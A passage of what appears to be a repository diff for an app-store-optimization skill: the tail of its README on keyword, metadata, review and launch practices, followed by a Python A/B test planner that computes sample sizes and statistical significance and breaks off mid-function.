- **Market Trend Analysis**: Identify emerging trends and opportunities in your app category
- **Review Sentiment Analysis**: Extract insights from user reviews to identify strengths and issues
- **Category Analysis**: Evaluate optimal category and subcategory placement strategies

### Metadata Optimization
- **Title Optimization**: Create compelling titles with optimal keyword placement (platform-specific character limits)
- **Description Optimization**: Craft both short and full descriptions that convert and rank
- **Subtitle/Promotional Text**: Optimize Apple-specific subtitle (30 chars) and promotional text (170 chars)
- **Keyword Field**: Maximize Apple's 100-character keyword field with strategic selection
- **Category Selection**: Data-driven recommendations for primary and secondary categories
- **Icon Best Practices**: Guidelines for designing high-converting app icons
- **Screenshot Optimization**: Strategies for creating screenshots that drive installs
- **Preview Video**: Best practices for app preview videos
- **Localization**: Multi-language optimization strategies for global reach

### Conversion Optimization
- **A/B Testing Framework**: Plan and track metadata experiments for continuous improvement
- **Visual Asset Testing**: Test icons, screenshots, and videos for maximum conversion
- **Store Listing Optimization**: Comprehensive page optimization for impression-to-install conversion
- **Call-to-Action**: Optimize CTAs in descriptions and promotional materials

### Rating & Review Management
- **Review Monitoring**: Track and analyze user reviews for actionable insights
- **Response Strategies**: Templates and best practices for responding to reviews
- **Rating Improvement**: Tactical approaches to improve app ratings organically
- **Issue Identification**: Surface common problems and feature requests from reviews

### Launch & Update Strategies
- **Pre-Launch Checklist**: Complete validation before submitting to stores
- **Launch Timing**: Optimize release timing for maximum visibility and downloads
- **Update Cadence**: Plan optimal update frequency and feature rollouts
- **Feature Announcements**: Craft "What's New" sections that re-engage users
- **Seasonal Optimization**: Leverage seasonal trends and events

### Analytics & Tracking
- **ASO Score**: Calculate overall ASO health score across multiple factors
- **Keyword Rankings**: Track keyword position changes over time
- **Conversion Metrics**: Monitor impression-to-install conversion rates
- **Download Velocity**: Track download trends and momentum
- **Performance Benchmarking**: Compare against category averages and competitors

### Platform-Specific Requirements
- **Apple App Store**:
  - Title: 30 characters
  - Subtitle: 30 characters
  - Promotional Text: 170 characters (editable without app update)
  - Description: 4,000 characters
  - Keywords: 100 characters (comma-separated, no spaces)
  - What's New: 4,000 characters
- **Google Play Store**:
  - Title: 50 characters (formerly 30, increased in 2021)
  - Short Description: 80 characters
  - Full Description: 4,000 characters
  - No separate keyword field (keywords extracted from title and description)

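The limits above translate directly into a lookup table that any validation step can reuse. A minimal sketch — the `LIMITS` table mirrors the list above, while the `validate_metadata` helper and its name are illustrative, not part of the shipped modules:

```python
# Character limits taken from the platform requirements listed above
LIMITS = {
    'apple': {'title': 30, 'subtitle': 30, 'promotional_text': 170,
              'description': 4000, 'keywords': 100, 'whats_new': 4000},
    'google': {'title': 50, 'short_description': 80, 'description': 4000},
}

def validate_metadata(platform, metadata):
    """Return {field: (length, limit, within_limit)} for every known field."""
    report = {}
    for field, value in metadata.items():
        limit = LIMITS[platform].get(field)
        if limit is not None:
            report[field] = (len(value), limit, len(value) <= limit)
    return report

report = validate_metadata('apple', {
    'title': 'FitFlow - Home Workouts & Yoga',      # exactly 30 characters
    'subtitle': 'AI plans, nutrition, progress',
})
print(report)
```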
## Input Requirements

### Keyword Research
```json
{
  "app_name": "MyApp",
  "category": "Productivity",
  "target_keywords": ["task manager", "productivity", "todo list"],
  "competitors": ["Todoist", "Any.do", "Microsoft To Do"],
  "language": "en-US"
}
```

### Metadata Optimization
```json
{
  "platform": "apple" | "google",
  "app_info": {
    "name": "MyApp",
    "category": "Productivity",
    "target_audience": "Professionals aged 25-45",
    "key_features": ["Task management", "Team collaboration", "AI assistance"],
    "unique_value": "AI-powered task prioritization"
  },
  "current_metadata": {
    "title": "Current Title",
    "subtitle": "Current Subtitle",
    "description": "Current description..."
  },
  "target_keywords": ["productivity", "task manager", "todo"]
}
```

### Review Analysis
```json
{
  "app_id": "com.myapp.app",
  "platform": "apple" | "google",
  "date_range": "last_30_days" | "last_90_days" | "all_time",
  "rating_filter": [1, 2, 3, 4, 5],
  "language": "en"
}
```

### ASO Score Calculation
```json
{
  "metadata": {
    "title_quality": 0.8,
    "description_quality": 0.7,
    "keyword_density": 0.6
  },
  "ratings": {
    "average_rating": 4.5,
    "total_ratings": 15000
  },
  "conversion": {
    "impression_to_install": 0.05
  },
  "keyword_rankings": {
    "top_10": 5,
    "top_50": 12,
    "top_100": 18
  }
}
```

## Output Formats

### Keyword Research Report
- List of recommended keywords with search volume estimates
- Competition level analysis (low/medium/high)
- Relevance scores for each keyword
- Strategic recommendations for primary vs. secondary keywords
- Long-tail keyword opportunities

### Optimized Metadata Package
- Platform-specific title (with character count validation)
- Subtitle/promotional text (Apple)
- Short description (Google)
- Full description (both platforms)
- Keyword field (Apple - 100 chars)
- Character count validation for all fields
- Keyword density analysis
- Before/after comparison

### Competitor Analysis Report
- Top 10 competitors in category
- Their metadata strategies
- Keyword overlap analysis
- Visual asset assessment
- Rating and review volume comparison
- Identified gaps and opportunities

### ASO Health Score
- Overall score (0-100)
- Category breakdown:
  - Metadata Quality (0-25)
  - Ratings & Reviews (0-25)
  - Keyword Performance (0-25)
  - Conversion Metrics (0-25)
- Specific improvement recommendations
- Priority action items

### A/B Test Plan
- Hypothesis and test variables
- Test duration recommendations
- Success metrics definition
- Sample size calculations
- Statistical significance thresholds

### Launch Checklist
- Pre-submission validation (all required assets, metadata)
- Store compliance verification
- Testing checklist (devices, OS versions)
- Marketing preparation items
- Post-launch monitoring plan

## How to Use

### Keyword Research
```
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for a productivity app targeting professionals? Focus on keywords with good search volume but lower competition.
```

### Optimize App Store Listing
```
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app's metadata for the Apple App Store? Here's my current listing: [provide current metadata]. I want to rank for "task management" and "productivity tools".
```

### Analyze Competitor Strategy
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of Todoist, Any.do, and Microsoft To Do? I want to understand what they're doing well and where there are opportunities.
```

### Review Sentiment Analysis
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze recent reviews for my app (com.myapp.ios) and identify the most common user complaints and feature requests?
```

### Calculate ASO Score
```
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's overall ASO health score and provide specific recommendations for improvement?
```

### Plan A/B Test
```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test my app icon and first screenshot. Can you help me design the test and determine how long to run it?
```

### Pre-Launch Checklist
```
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for submitting my app to both Apple App Store and Google Play Store?
```

## Scripts

### keyword_analyzer.py
Analyzes keywords for search volume, competition, and relevance. Provides strategic recommendations for primary and secondary keywords.

**Key Functions:**
- `analyze_keyword()`: Analyze single keyword metrics
- `compare_keywords()`: Compare multiple keywords
- `find_long_tail()`: Discover long-tail keyword opportunities
- `calculate_keyword_difficulty()`: Assess competition level

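Long-tail discovery of the kind `find_long_tail()` promises can be approximated by combining seed keywords with common search modifiers. A minimal sketch — the modifier list and this implementation are illustrative assumptions, not the module's actual logic:

```python
from itertools import product

# Illustrative modifier list; a real analyzer would mine these from search data
MODIFIERS = ["free", "for beginners", "at home", "tracker", "planner"]

def find_long_tail(seed_keywords, modifiers=MODIFIERS):
    """Combine seeds with common modifiers into 2-4 word long-tail phrases."""
    phrases = []
    for seed, mod in product(seed_keywords, modifiers):
        phrase = f"{seed} {mod}"
        if 2 <= len(phrase.split()) <= 4:  # keep it a realistic search query
            phrases.append(phrase)
    return phrases

tails = find_long_tail(["yoga", "meal planning"])
print(tails[:3])
```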
### metadata_optimizer.py
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.

**Key Functions:**
- `optimize_title()`: Create compelling, keyword-rich titles
- `optimize_description()`: Generate conversion-focused descriptions
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
- `validate_character_limits()`: Ensure compliance with platform limits
- `calculate_keyword_density()`: Analyze keyword usage in metadata

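Keyword density in this sense is just the share of description words consumed by each target phrase. A minimal sketch of the idea behind `calculate_keyword_density()` — the `keyword_density` helper here is an illustrative stand-in, not the module's actual implementation:

```python
import re

def keyword_density(description, keywords):
    """Fraction of words in `description` accounted for by each target keyword."""
    words = re.findall(r"[a-z']+", description.lower())
    total = len(words)
    density = {}
    for kw in keywords:
        kw_words = kw.lower().split()
        n = len(kw_words)
        # Count non-overlapping-agnostic occurrences of the word sequence
        hits = sum(1 for i in range(total - n + 1) if words[i:i + n] == kw_words)
        density[kw] = round(hits * n / total, 3) if total else 0.0
    return density

desc = ("FitFlow builds a fitness habit: home workouts, yoga, "
        "and meal planning for fitness fans.")
print(keyword_density(desc, ["fitness", "home workouts"]))
```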
### competitor_analyzer.py
Analyzes top competitors' ASO strategies and identifies opportunities.

**Key Functions:**
- `get_top_competitors()`: Identify category leaders
- `analyze_competitor_metadata()`: Extract and analyze competitor keywords
- `compare_visual_assets()`: Evaluate icons and screenshots
- `identify_gaps()`: Find competitive opportunities

### aso_scorer.py
Calculates comprehensive ASO health score across multiple dimensions.

**Key Functions:**
- `calculate_overall_score()`: Compute 0-100 ASO score
- `score_metadata_quality()`: Evaluate title, description, keywords
- `score_ratings_reviews()`: Assess rating quality and volume
- `score_keyword_performance()`: Analyze ranking positions
- `score_conversion_metrics()`: Evaluate impression-to-install rates
- `generate_recommendations()`: Provide prioritized action items

### ab_test_planner.py
Plans and tracks A/B tests for metadata and visual assets.

**Key Functions:**
- `design_test()`: Create test hypothesis and variables
- `calculate_sample_size()`: Determine required test duration
- `calculate_significance()`: Assess statistical significance
- `track_results()`: Monitor test performance
- `generate_report()`: Summarize test outcomes

### localization_helper.py
Manages multi-language ASO optimization strategies.

**Key Functions:**
- `identify_target_markets()`: Recommend localization priorities
- `translate_metadata()`: Generate localized metadata
- `adapt_keywords()`: Research locale-specific keywords
- `validate_translations()`: Check character limits per language
- `calculate_localization_roi()`: Estimate impact of localization

### review_analyzer.py
Analyzes user reviews for sentiment, issues, and feature requests.

**Key Functions:**
- `analyze_sentiment()`: Calculate positive/negative/neutral ratios
- `extract_common_themes()`: Identify frequently mentioned topics
- `identify_issues()`: Surface bugs and user complaints
- `find_feature_requests()`: Extract desired features
- `track_sentiment_trends()`: Monitor sentiment over time
- `generate_response_templates()`: Create review response drafts

### launch_checklist.py
Generates comprehensive pre-launch and update checklists.

**Key Functions:**
- `generate_prelaunch_checklist()`: Complete submission validation
- `validate_app_store_compliance()`: Check Apple guidelines
- `validate_play_store_compliance()`: Check Google policies
- `create_update_plan()`: Plan update cadence and features
- `optimize_launch_timing()`: Recommend release dates
- `plan_seasonal_campaigns()`: Identify seasonal opportunities

## Best Practices

### Keyword Research
1. **Volume vs. Competition**: Balance high-volume keywords with achievable rankings
2. **Relevance First**: Only target keywords genuinely relevant to your app
3. **Long-Tail Strategy**: Include 3-4 word phrases with lower competition
4. **Continuous Research**: Keyword trends change—research quarterly
5. **Competitor Keywords**: Don't copy blindly; ensure relevance to your features

### Metadata Optimization
1. **Front-Load Keywords**: Place most important keywords early in title/description
2. **Natural Language**: Write for humans first, SEO second
3. **Feature Benefits**: Focus on user benefits, not just features
4. **A/B Test Everything**: Test titles, descriptions, screenshots systematically
5. **Update Regularly**: Refresh metadata every major update
6. **Character Limits**: Use every character—don't waste valuable space
7. **Apple Keyword Field**: No plurals, duplicates, or spaces between commas

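Point 7 can be enforced mechanically when filling the 100-character field. A sketch of greedy packing — the `pack_keyword_field` helper and its plural heuristic are illustrative assumptions, not part of the shipped modules:

```python
def pack_keyword_field(candidates, limit=100):
    """Greedily pack deduplicated keywords into Apple's 100-char field."""
    seen, packed = set(), []
    for kw in candidates:
        kw = kw.strip().lower()
        if not kw or kw in seen or kw.rstrip('s') in seen:
            continue  # skip duplicates and trivial plural variants
        field = ','.join(packed + [kw])  # commas only, no spaces after commas
        if len(field) <= limit:
            packed.append(kw)
            seen.add(kw)
            seen.add(kw.rstrip('s'))
    return ','.join(packed)

field = pack_keyword_field(["workout", "workouts", "yoga", "Yoga",
                            "meal planner", "home fitness", "hiit"])
print(field, len(field))
```

Note that plural handling in practice is subtler than stripping a trailing "s"; this heuristic only illustrates the "no plurals, no duplicates" rule.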
### Visual Assets
1. **Icon**: Must be recognizable at small sizes (60x60px)
2. **Screenshots**: First 2-3 are critical—most users don't scroll
3. **Captions**: Use screenshot captions to tell your value story
4. **Consistency**: Match visual style to app design
5. **A/B Test Icons**: Icon is the single most important visual element

### Reviews & Ratings
1. **Respond Quickly**: Reply to reviews within 24-48 hours
2. **Professional Tone**: Always courteous, even with negative reviews
3. **Address Issues**: Show you're actively fixing reported problems
4. **Thank Supporters**: Acknowledge positive reviews
5. **Prompt Strategically**: Ask for ratings after positive experiences

### Launch Strategy
1. **Soft Launch**: Consider launching in smaller markets first
2. **PR Timing**: Coordinate press coverage with launch
3. **Update Frequently**: Initial updates signal active development
4. **Monitor Closely**: Track metrics daily for the first 2 weeks
5. **Iterate Quickly**: Fix critical issues immediately

### Localization
1. **Prioritize Markets**: Start with English, Spanish, Chinese, French, German
2. **Native Speakers**: Use professional translators, not machine translation
3. **Cultural Adaptation**: Some features resonate differently by culture
4. **Test Locally**: Have native speakers review before publishing
5. **Measure ROI**: Track downloads by locale to assess impact

## Limitations

### Data Dependencies
- Keyword search volume estimates are approximate (no official data from Apple/Google)
- Competitor data may be incomplete for private apps
- Review analysis limited to public reviews (can't access private feedback)
- Historical data may not be available for new apps

### Platform Constraints
- Apple App Store keyword changes require app submission (except Promotional Text)
- Google Play Store metadata changes take 1-2 hours to index
- A/B testing requires significant traffic for statistical significance
- Store algorithms are proprietary and change without notice

### Industry Variability
- ASO benchmarks vary significantly by category (games vs. utilities)
- Seasonality affects different categories differently
- Geographic markets have different competitive landscapes
- Cultural preferences impact what works in different countries

### Scope Boundaries
- Does not include paid user acquisition strategies (Apple Search Ads, Google Ads)
- Does not cover app development or UI/UX optimization
- Does not include app analytics implementation (use Firebase, Mixpanel, etc.)
- Does not handle app submission technical issues (provisioning profiles, certificates)

### When NOT to Use This Skill
- For web apps (different SEO strategies apply)
- For enterprise apps not in public stores
- For apps in beta/TestFlight only
- If you need paid advertising strategies (use marketing skills instead)

## Integration with Other Skills

This skill works well with:
- **Content Strategy Skills**: For creating app descriptions and marketing copy
- **Analytics Skills**: For analyzing download and engagement data
- **Localization Skills**: For managing multi-language content
- **Design Skills**: For creating optimized visual assets
- **Marketing Skills**: For coordinating broader launch campaigns

## Version & Updates

This skill is based on current Apple App Store and Google Play Store requirements as of November 2025. Store policies and best practices evolve—verify current requirements before major launches.

**Key Updates to Monitor:**
- Apple App Store Connect updates (apple.com/app-store/review/guidelines)
- Google Play Console updates (play.google.com/console/about/guides/releasewithconfidence)
- iOS/Android version adoption rates (affects device testing)
- Store algorithm changes (follow ASO blogs and communities)

## When to Use

Use this skill for any of the ASO workflows described above: keyword research, metadata optimization, competitor analysis, ASO scoring, A/B testing, localization, review analysis, and launch planning.
662
packages/llm/skills/app-store-optimization/ab_test_planner.py
Normal file
@@ -0,0 +1,662 @@
"""
|
||||
A/B testing module for App Store Optimization.
|
||||
Plans and tracks A/B tests for metadata and visual assets.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
import math
|
||||
|
||||
|
||||
class ABTestPlanner:
|
||||
"""Plans and tracks A/B tests for ASO elements."""
|
||||
|
||||
    # Minimum detectable effect sizes (conservative estimates)
    MIN_EFFECT_SIZES = {
        'icon': 0.10,         # 10% conversion improvement
        'screenshot': 0.08,   # 8% conversion improvement
        'title': 0.05,        # 5% conversion improvement
        'description': 0.03   # 3% conversion improvement
    }

    # Statistical confidence levels
    CONFIDENCE_LEVELS = {
        'high': 0.95,         # 95% confidence
        'standard': 0.90,     # 90% confidence
        'exploratory': 0.80   # 80% confidence
    }

    def __init__(self):
        """Initialize A/B test planner."""
        self.active_tests = []

    def design_test(
        self,
        test_type: str,
        variant_a: Dict[str, Any],
        variant_b: Dict[str, Any],
        hypothesis: str,
        success_metric: str = 'conversion_rate'
    ) -> Dict[str, Any]:
        """
        Design an A/B test with hypothesis and variables.

        Args:
            test_type: Type of test ('icon', 'screenshot', 'title', 'description')
            variant_a: Control variant details
            variant_b: Test variant details
            hypothesis: Expected outcome hypothesis
            success_metric: Metric to optimize

        Returns:
            Test design with configuration
        """
        test_design = {
            'test_id': self._generate_test_id(test_type),
            'test_type': test_type,
            'hypothesis': hypothesis,
            'variants': {
                'a': {
                    'name': 'Control',
                    'details': variant_a,
                    'traffic_split': 0.5
                },
                'b': {
                    'name': 'Variation',
                    'details': variant_b,
                    'traffic_split': 0.5
                }
            },
            'success_metric': success_metric,
            'secondary_metrics': self._get_secondary_metrics(test_type),
            'minimum_effect_size': self.MIN_EFFECT_SIZES.get(test_type, 0.05),
            'recommended_confidence': 'standard',
            'best_practices': self._get_test_best_practices(test_type)
        }

        self.active_tests.append(test_design)
        return test_design

    def calculate_sample_size(
        self,
        baseline_conversion: float,
        minimum_detectable_effect: float,
        confidence_level: str = 'standard',
        power: float = 0.80
    ) -> Dict[str, Any]:
        """
        Calculate required sample size for statistical significance.

        Args:
            baseline_conversion: Current conversion rate (0-1)
            minimum_detectable_effect: Minimum effect size to detect (0-1)
            confidence_level: 'high', 'standard', or 'exploratory'
            power: Statistical power (typically 0.80 or 0.90)

        Returns:
            Sample size calculation with duration estimates
        """
        alpha = 1 - self.CONFIDENCE_LEVELS[confidence_level]
        beta = 1 - power

        # Expected conversion for variant B
        expected_conversion_b = baseline_conversion * (1 + minimum_detectable_effect)

        # Z-scores for alpha and beta
        z_alpha = self._get_z_score(1 - alpha / 2)  # Two-tailed test
        z_beta = self._get_z_score(power)

        # Pooled standard deviation
        p_pooled = (baseline_conversion + expected_conversion_b) / 2
        sd_pooled = math.sqrt(2 * p_pooled * (1 - p_pooled))

        # Sample size per variant
        n_per_variant = math.ceil(
            ((z_alpha + z_beta) ** 2 * sd_pooled ** 2) /
            ((expected_conversion_b - baseline_conversion) ** 2)
        )

        total_sample_size = n_per_variant * 2

        # Estimate duration based on typical traffic
        duration_estimates = self._estimate_test_duration(
            total_sample_size,
            baseline_conversion
        )

        return {
            'sample_size_per_variant': n_per_variant,
            'total_sample_size': total_sample_size,
            'baseline_conversion': baseline_conversion,
            'expected_conversion_improvement': minimum_detectable_effect,
            'expected_conversion_b': expected_conversion_b,
            'confidence_level': confidence_level,
            'statistical_power': power,
            'duration_estimates': duration_estimates,
            'recommendations': self._generate_sample_size_recommendations(
                n_per_variant,
                duration_estimates
            )
        }

    def calculate_significance(
        self,
        variant_a_conversions: int,
        variant_a_visitors: int,
        variant_b_conversions: int,
        variant_b_visitors: int
    ) -> Dict[str, Any]:
        """
        Calculate statistical significance of test results.

        Args:
            variant_a_conversions: Conversions for control
            variant_a_visitors: Visitors for control
            variant_b_conversions: Conversions for variation
            variant_b_visitors: Visitors for variation

        Returns:
            Significance analysis with decision recommendation
        """
        # Calculate conversion rates
        rate_a = variant_a_conversions / variant_a_visitors if variant_a_visitors > 0 else 0
        rate_b = variant_b_conversions / variant_b_visitors if variant_b_visitors > 0 else 0

        # Calculate improvement
        if rate_a > 0:
            relative_improvement = (rate_b - rate_a) / rate_a
        else:
            relative_improvement = 0

        absolute_improvement = rate_b - rate_a

        # Calculate standard error
        se_a = math.sqrt(rate_a * (1 - rate_a) / variant_a_visitors) if variant_a_visitors > 0 else 0
        se_b = math.sqrt(rate_b * (1 - rate_b) / variant_b_visitors) if variant_b_visitors > 0 else 0
        se_diff = math.sqrt(se_a**2 + se_b**2)

        # Calculate z-score
        z_score = absolute_improvement / se_diff if se_diff > 0 else 0

        # Calculate p-value (two-tailed)
        p_value = 2 * (1 - self._standard_normal_cdf(abs(z_score)))

        # Determine significance
        is_significant_95 = p_value < 0.05
        is_significant_90 = p_value < 0.10

        # Generate decision
        decision = self._generate_test_decision(
            relative_improvement,
            is_significant_95,
            is_significant_90,
            variant_a_visitors + variant_b_visitors
        )

        return {
            'variant_a': {
                'conversions': variant_a_conversions,
                'visitors': variant_a_visitors,
                'conversion_rate': round(rate_a, 4)
            },
            'variant_b': {
                'conversions': variant_b_conversions,
                'visitors': variant_b_visitors,
                'conversion_rate': round(rate_b, 4)
            },
            'improvement': {
                'absolute': round(absolute_improvement, 4),
                'relative_percentage': round(relative_improvement * 100, 2)
            },
            'statistical_analysis': {
                'z_score': round(z_score, 3),
                'p_value': round(p_value, 4),
                'is_significant_95': is_significant_95,
                'is_significant_90': is_significant_90,
                'confidence_level': '95%' if is_significant_95 else ('90%' if is_significant_90 else 'Not significant')
            },
            'decision': decision
        }

    def track_test_results(
        self,
        test_id: str,
        results_data: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Track ongoing test results and provide recommendations.

        Args:
            test_id: Test identifier
            results_data: Current test results

        Returns:
            Test tracking report with next steps
        """
        # Find test
        test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
        if not test:
            return {'error': f'Test {test_id} not found'}

        # Calculate significance
        significance = self.calculate_significance(
            results_data['variant_a_conversions'],
            results_data['variant_a_visitors'],
            results_data['variant_b_conversions'],
            results_data['variant_b_visitors']
        )

        # Calculate test progress
        total_visitors = results_data['variant_a_visitors'] + results_data['variant_b_visitors']
        required_sample = results_data.get('required_sample_size', 10000)
        progress_percentage = min((total_visitors / required_sample) * 100, 100)

        # Generate recommendations
        recommendations = self._generate_tracking_recommendations(
            significance,
            progress_percentage,
            test['test_type']
        )

        return {
            'test_id': test_id,
            'test_type': test['test_type'],
            'progress': {
                'total_visitors': total_visitors,
                'required_sample_size': required_sample,
                'progress_percentage': round(progress_percentage, 1),
                'is_complete': progress_percentage >= 100
            },
            'current_results': significance,
            'recommendations': recommendations,
            'next_steps': self._determine_next_steps(
                significance,
                progress_percentage
            )
        }

    def generate_test_report(
        self,
        test_id: str,
        final_results: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Generate final test report with insights and recommendations.

        Args:
            test_id: Test identifier
            final_results: Final test results

        Returns:
            Comprehensive test report
        """
        test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
        if not test:
            return {'error': f'Test {test_id} not found'}

        significance = self.calculate_significance(
            final_results['variant_a_conversions'],
            final_results['variant_a_visitors'],
            final_results['variant_b_conversions'],
            final_results['variant_b_visitors']
        )

        # Generate insights
        insights = self._generate_test_insights(
            test,
            significance,
            final_results
        )

        # Implementation plan
        implementation_plan = self._create_implementation_plan(
            test,
            significance
        )

        return {
            'test_summary': {
                'test_id': test_id,
                'test_type': test['test_type'],
                'hypothesis': test['hypothesis'],
                'duration_days': final_results.get('duration_days', 'N/A')
            },
            'results': significance,
            'insights': insights,
            'implementation_plan': implementation_plan,
            'learnings': self._extract_learnings(test, significance)
        }

    def _generate_test_id(self, test_type: str) -> str:
        """Generate unique test ID."""
        import time
        timestamp = int(time.time())
        return f"{test_type}_{timestamp}"

    def _get_secondary_metrics(self, test_type: str) -> List[str]:
        """Get secondary metrics to track for test type."""
        metrics_map = {
            'icon': ['tap_through_rate', 'impression_count', 'brand_recall'],
            'screenshot': ['tap_through_rate', 'time_on_page', 'scroll_depth'],
            'title': ['impression_count', 'tap_through_rate', 'search_visibility'],
            'description': ['time_on_page', 'scroll_depth', 'tap_through_rate']
        }
        return metrics_map.get(test_type, ['tap_through_rate'])

    def _get_test_best_practices(self, test_type: str) -> List[str]:
        """Get best practices for specific test type."""
        practices_map = {
            'icon': [
                'Test only one element at a time (color vs. style vs. symbolism)',
                'Ensure icon is recognizable at small sizes (60x60px)',
                'Consider cultural context for global audience',
                'Test against top competitor icons'
            ],
            'screenshot': [
                'Test order of screenshots (users see first 2-3)',
                'Use captions to tell story',
                'Show key features and benefits',
                'Test with and without device frames'
            ],
            'title': [
                'Test keyword variations, not major rebrand',
                'Keep brand name consistent',
                'Ensure title fits within character limits',
                'Test on both search and browse contexts'
            ],
            'description': [
                'Test structure (bullet points vs. paragraphs)',
                'Test call-to-action placement',
                'Test feature vs. benefit focus',
                'Maintain keyword density'
            ]
        }
        return practices_map.get(test_type, ['Test one variable at a time'])

    def _estimate_test_duration(
        self,
        required_sample_size: int,
        baseline_conversion: float
    ) -> Dict[str, Any]:
        """Estimate test duration based on typical traffic levels."""
        # Assume different daily traffic scenarios
        traffic_scenarios = {
            'low': 100,      # 100 page views/day
            'medium': 1000,  # 1000 page views/day
            'high': 10000    # 10000 page views/day
        }

        estimates = {}
        for scenario, daily_views in traffic_scenarios.items():
            days = math.ceil(required_sample_size / daily_views)
            estimates[scenario] = {
                'daily_page_views': daily_views,
                'estimated_days': days,
                'estimated_weeks': round(days / 7, 1)
            }

        return estimates

    def _generate_sample_size_recommendations(
        self,
        sample_size: int,
        duration_estimates: Dict[str, Any]
    ) -> List[str]:
        """Generate recommendations based on sample size."""
        recommendations = []

        if sample_size > 50000:
            recommendations.append(
                "Large sample size required - consider testing smaller effect size or increasing traffic"
            )

        if duration_estimates['medium']['estimated_days'] > 30:
            recommendations.append(
                "Long test duration - consider higher minimum detectable effect or focus on high-impact changes"
            )

        if duration_estimates['low']['estimated_days'] > 60:
            recommendations.append(
                "Insufficient traffic for reliable testing - consider user acquisition or broader targeting"
            )

        if not recommendations:
            recommendations.append("Sample size and duration are reasonable for this test")

        return recommendations

    def _get_z_score(self, percentile: float) -> float:
        """Get z-score for given percentile (approximation)."""
        # Common z-scores
        z_scores = {
            0.80: 0.84,
            0.85: 1.04,
            0.90: 1.28,
            0.95: 1.645,
            0.975: 1.96,
            0.99: 2.33
        }
        return z_scores.get(percentile, 1.96)

    def _standard_normal_cdf(self, z: float) -> float:
        """Approximate standard normal cumulative distribution function."""
        # Using error function approximation
        t = 1.0 / (1.0 + 0.2316419 * abs(z))
        d = 0.3989423 * math.exp(-z * z / 2.0)
        p = d * t * (0.3193815 + t * (-0.3565638 + t * (1.781478 + t * (-1.821256 + t * 1.330274))))

        if z > 0:
            return 1.0 - p
        else:
            return p

    def _generate_test_decision(
        self,
        improvement: float,
        is_significant_95: bool,
        is_significant_90: bool,
        total_visitors: int
    ) -> Dict[str, Any]:
        """Generate test decision and recommendation."""
        if total_visitors < 1000:
            return {
                'decision': 'continue',
                'rationale': 'Insufficient data - continue test to reach minimum sample size',
                'action': 'Keep test running'
            }

        if is_significant_95:
            if improvement > 0:
                return {
                    'decision': 'implement_b',
                    'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 95% confidence',
                    'action': 'Implement Variant B'
                }
            else:
                return {
                    'decision': 'keep_a',
                    'rationale': 'Variant A performs better with 95% confidence',
                    'action': 'Keep current version (A)'
                }

        elif is_significant_90:
            if improvement > 0:
                return {
                    'decision': 'implement_b_cautiously',
                    'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 90% confidence',
                    'action': 'Consider implementing B, monitor closely'
                }
            else:
                return {
                    'decision': 'keep_a',
                    'rationale': 'Variant A performs better with 90% confidence',
                    'action': 'Keep current version (A)'
                }

        else:
            return {
                'decision': 'inconclusive',
                'rationale': 'No statistically significant difference detected',
                'action': 'Either keep A or test different hypothesis'
            }

    def _generate_tracking_recommendations(
        self,
        significance: Dict[str, Any],
        progress: float,
        test_type: str
    ) -> List[str]:
        """Generate recommendations for ongoing test."""
        recommendations = []

        if progress < 50:
            recommendations.append(
                f"Test is {progress:.0f}% complete - continue collecting data"
            )

        if progress >= 100:
            if significance['statistical_analysis']['is_significant_95']:
                recommendations.append(
                    "Sufficient data collected with significant results - ready to conclude test"
                )
            else:
                recommendations.append(
                    "Sample size reached but no significant difference - consider extending test or concluding"
                )

        return recommendations

    def _determine_next_steps(
        self,
        significance: Dict[str, Any],
        progress: float
    ) -> str:
        """Determine next steps for test."""
        if progress < 100:
            return f"Continue test until reaching 100% sample size (currently {progress:.0f}%)"

        decision = significance.get('decision', {}).get('decision', 'inconclusive')

        if decision == 'implement_b':
            return "Implement Variant B and monitor metrics for 2 weeks"
        elif decision == 'keep_a':
            return "Keep Variant A and design new test with different hypothesis"
        else:
            return "Test inconclusive - either keep A or design new test"

    def _generate_test_insights(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any],
        results: Dict[str, Any]
    ) -> List[str]:
        """Generate insights from test results."""
        insights = []

        improvement = significance['improvement']['relative_percentage']

        if significance['statistical_analysis']['is_significant_95']:
            insights.append(
                f"Strong evidence: Variant B {'improved' if improvement > 0 else 'decreased'} "
                f"conversion by {abs(improvement):.1f}% with 95% confidence"
            )

        insights.append(
            f"Tested {test['test_type']} changes: {test['hypothesis']}"
        )

        # Add context-specific insights
        if test['test_type'] == 'icon' and improvement > 5:
            insights.append(
                "Icon change had substantial impact - visual first impression is critical"
            )

        return insights

    def _create_implementation_plan(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any]
    ) -> List[Dict[str, str]]:
        """Create implementation plan for winning variant."""
        plan = []

        if significance.get('decision', {}).get('decision') == 'implement_b':
            plan.append({
                'step': '1. Update store listing',
                'details': f"Replace {test['test_type']} with Variant B across all platforms"
            })
            plan.append({
                'step': '2. Monitor metrics',
                'details': 'Track conversion rate for 2 weeks to confirm sustained improvement'
            })
            plan.append({
                'step': '3. Document learnings',
                'details': 'Record insights for future optimization'
            })

        return plan

    def _extract_learnings(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any]
    ) -> List[str]:
        """Extract key learnings from test."""
        learnings = []

        improvement = significance['improvement']['relative_percentage']

        learnings.append(
            f"Testing {test['test_type']} can yield {abs(improvement):.1f}% conversion change"
        )

        if test['test_type'] == 'title':
            learnings.append(
                "Title changes affect search visibility and user perception"
            )
        elif test['test_type'] == 'screenshot':
            learnings.append(
                "First 2-3 screenshots are critical for conversion"
            )

        return learnings


def plan_ab_test(
    test_type: str,
    variant_a: Dict[str, Any],
    variant_b: Dict[str, Any],
    hypothesis: str,
    baseline_conversion: float
) -> Dict[str, Any]:
    """
